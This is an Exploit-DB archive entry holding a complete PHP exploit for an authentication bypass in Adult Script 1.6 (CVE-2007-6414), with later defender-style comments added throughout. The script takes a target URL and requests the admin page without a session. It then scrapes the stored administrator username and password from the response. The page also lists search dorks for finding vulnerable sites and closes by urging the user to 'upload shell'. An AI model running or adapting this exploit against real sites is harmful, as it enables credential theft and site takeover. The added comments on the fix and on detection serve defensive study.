Adult Script <= 1.6 Unauthorized Administrative Access Exploit

2007-12-13T00:00:00
ID EDB-ID:4731
Type exploitdb
Reporter Liz0ziM
Modified 2007-12-13T00:00:00

Description

Adult Script <= 1.6 Unauthorized Administrative Access Exploit. CVE-2007-6414. Webapps exploit for php platform

                                        
                                            &lt;? ob_implicit_flush(true); ?&gt;
&lt;title&gt;Adult Script Unauthorized Administrative Access Exploit&lt;/title&gt;
&lt;style&gt;
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}  
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}
a:link {
	color: #999999;
	text-decoration: none;
        font-weight: bold;
	background-color:#000000;
}
a:visited {
	color: #999999;
	text-decoration: none;
        font-weight: bold;
	background-color:#000000;
}
&lt;/style&gt;&lt;br&gt;

&lt;h3&gt;Adult Script Unauthorized Administrative Access Exploit&lt;/h3&gt;&lt;br&gt;
Exploit Coded By Liz0ziM From &lt;a href="http://www.biyofrm.com"&gt;BiyoSecurityTeam&lt;/a&gt;&lt;br&gt;
Greetz My all friend and BiyoSecurityTeam User..
&lt;br&gt;
Software site: http://www.adultscript.net/&lt;br&gt;
Demo: http://www.adultscript.net/demo/&lt;br&gt;

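Vulnerable code in &lt;b&gt;admin/administrator.php&lt;/b&gt; near lines 5-8: the check below only sends a redirect header and does not stop the script, so the rest of the page is still returned to a client that ignores the redirect.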

&lt;pre&gt;
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me :D
} 
&lt;/pre&gt;
&lt;br&gt;
&lt;b&gt;Dork&lt;/b&gt;:&lt;br&gt;
inurl:submit-user-link.html&lt;br&gt;
inurl:video-listing-cat&lt;br&gt;
inurl:hosted-videos&lt;br&gt;
inurl:porn-listing-cat&lt;br&gt;
"Powered By AdultScript.NET"&lt;br&gt;
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"&lt;br&gt;
&lt;br&gt;
&lt;form method="POST" action=""&gt;
&lt;input name="adres" type="text" value="Target  example: http://www.site.com/" size="70" onFocus="if(this.value=='Target  example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target  example: http://www.site.com/'"&gt;
&lt;input name="yolla" type="submit" value="Send"&gt;
&lt;/form&gt;

&lt;br&gt;
&lt;?php
/**
 * Fetch a URL with cURL and return the raw response body.
 *
 * CURLOPT_FOLLOWLOCATION is never set here, so a "Location:" redirect is not
 * followed: the caller gets whatever body the server sent together with the
 * redirect. Defender takeaway: a redirect header is only advice to the
 * client and is not an access control unless the server also stops rendering.
 *
 * No cookies, credentials or custom headers are attached to the request.
 *
 * @param string $liz0 URL to request (handed to CURLOPT_URL unchanged).
 * @return mixed Response body as a string; curl_exec() yields false on failure,
 *               and that value is returned without any error handling.
 */
function dosya_indir($liz0){
		
		
		$ch = curl_init();
		// 0 places no explicit limit on the connection phase
		// (the PHP manual describes 0 as "wait indefinitely").
		$timeout = 0;
		curl_setopt ($ch, CURLOPT_URL, $liz0);
		// Return the body from curl_exec() instead of printing it.
		curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
		$veri = curl_exec($ch);
		curl_close($ch);
		
		return $veri;

	}

// Pattern capturing the contents of value="..." attributes in the fetched
// HTML. (.*) is greedy and "." does not cross newlines, so several attributes
// on one line would be captured as a single match.
$desen='|value="(.*)"|';

// Runs only when the form on this page was submitted (the "yolla" button).
if($_POST[yolla])
{
$adres=$_POST[adres];

// Case-insensitive substring test: "http" anywhere in the input suppresses
// the prefix, so this is not an anchored scheme check.
if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
// NOTE(review): this empty check runs after the prefixing above, so an empty
// submission has already become "http://" and the branch looks unreachable.
// The message is mojibake of a Turkish string (roughly "fill in the blanks").
if($adres=="") { echo 'BoÅŸ Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."&lt;br&gt;";
// Delay only; it has no effect on the request that follows.
sleep(1);
echo 'Sending Evil Code.......&lt;br&gt;';
// One plain GET for admin/administrator.php with no session or cookies.
// Per the snippet quoted earlier on this page, the application's guard emits
// header("Location: logout.php") but does not end the request, so the admin
// page body is still sent along with the redirect.
// Defender notes:
//  - Fix: terminate right after the redirect header (exit) in every admin
//    script that uses this guard. The quoted condition also joins its two
//    session tests with "&&"; presumably "||" was intended, so confirm that
//    against the application source.
//  - Detection: a session-less request to /admin/administrator.php that is
//    answered with a redirect to logout.php yet carries a full page body.
$kaynak=dosya_indir($adres."/admin/administrator.php");
// Delay only.
sleep(5);

// Success heuristic: any value=" in the response. The first two captures are
// then labelled username and password, which suggests the admin form pre-fills
// the stored credentials into its input fields (inferred from this code, not
// shown on the page). If so, the password is kept in recoverable form, so
// rotate admin credentials after patching and avoid echoing secrets into HTML.
if(eregi('value="',$kaynak)) { 
echo "Exploit Has Been Succeful &lt;br&gt;";
preg_match_all($desen,$kaynak,$sonuc);
// NOTE(review): $adres is written into the href and link text without
// htmlspecialchars(), unlike the 'Target=' line above, so submitted markup is
// reflected into this page as-is.
echo "&lt;a target='_blank' href='".$adres."/admin/'&gt;".$adres."/admin/&lt;/a&gt;&lt;br&gt;";
echo "&lt;b&gt;Username&lt;/b&gt; :".htmlspecialchars($sonuc[1][0])."&lt;br&gt;";
echo "&lt;b&gt;Password&lt;/b&gt;:".htmlspecialchars($sonuc[1][1])."&lt;br&gt;";
// NOTE(review): $adres is echoed unescaped here as well.
echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
// Reached when the body has no value=" at all, including when the fetch
// failed and dosya_indir() returned false.
echo "Exploit Has Been Failed! &lt;br&gt;";
}


}
?&gt;

# milw0rm.com [2007-12-13]